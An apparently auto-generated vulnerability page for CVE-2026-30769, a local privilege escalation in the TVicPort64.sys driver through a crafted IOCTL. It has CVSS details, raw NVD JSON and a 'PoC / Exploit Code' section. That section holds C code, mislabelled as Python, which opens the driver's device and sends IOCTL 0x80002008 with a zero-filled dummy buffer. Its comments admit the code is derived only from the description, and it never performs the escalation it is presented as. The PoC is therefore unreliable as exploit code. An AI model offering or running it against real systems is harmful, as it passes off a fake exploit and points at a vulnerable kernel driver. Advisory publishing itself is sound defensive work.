Security Vulnerability Report
中文
CVE-2026-30769 CVSS 7.8 HIGH

CVE-2026-30769

Published: 2026-04-29 16:16:23
Last Modified: 2026-05-05 14:31:16
Source: [email protected]

Description

An issue in the TVicPort64.sys component of EnTech Taiwan TVicPort Product v4.0, File v5.2.1.0 allows attackers to escalate privileges via sending crafted IOCTL 0x80002008 requests.

CVSS Details

CVSS Score
7.8
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:entechtaiwan:tvicport:5.2.1.0:*:*:*:*:*:*:* - VULNERABLE
EnTech Taiwan TVicPort v4.0 (TVicPort64.sys v5.2.1.0)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#include <windows.h> #include <stdio.h> int main() { HANDLE hDevice; DWORD bytesReturned; // Vulnerable IOCTL code extracted from description DWORD ioctlCode = 0x80002008; char buffer[0x100] = {0}; // Dummy buffer for PoC // Attempt to open the vulnerable device handle hDevice = CreateFileA("\\\\.\\TVicPort64", GENERIC_READ | GENERIC_WRITE, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL); if (hDevice == INVALID_HANDLE_VALUE) { printf("[-] Failed to open device. Error: %d\n", GetLastError()); printf("[-] Ensure the driver is loaded.\n"); return 1; } printf("[+] Device handle opened successfully.\n"); printf("[*] Sending malicious IOCTL request (0x80002008)...\n"); // Trigger the vulnerability by sending the crafted IOCTL BOOL result = DeviceIoControl(hDevice, ioctlCode, buffer, sizeof(buffer), NULL, 0, &bytesReturned, NULL); if (!result) { printf("[-] DeviceIoControl failed. Error: %d\n", GetLastError()); } else { printf("[+] IOCTL sent successfully. Check for exploitation results.\n"); } CloseHandle(hDevice); return 0; }

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30769", "sourceIdentifier": "[email protected]", "published": "2026-04-29T16:16:22.920", "lastModified": "2026-05-05T14:31:16.030", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue in the TVicPort64.sys component of EnTech Taiwan TVicPort Product v4.0, File v5.2.1.0 allows attackers to escalate privileges via sending crafted IOCTL 0x80002008 requests."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-20"}, {"lang": "en", "value": "CWE-269"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:entechtaiwan:tvicport:5.2.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "D06B6076-0024-4EB3-89A4-DB68299A809F"}]}]}], "references": [{"url": "https://gist.github.com/lleekkoo/6c73fa4e137aca6f5dfe6aec4f6a7b29", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.entechtaiwan.com/dev/port/index.shtm", "source": "[email protected]", "tags": ["Product"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.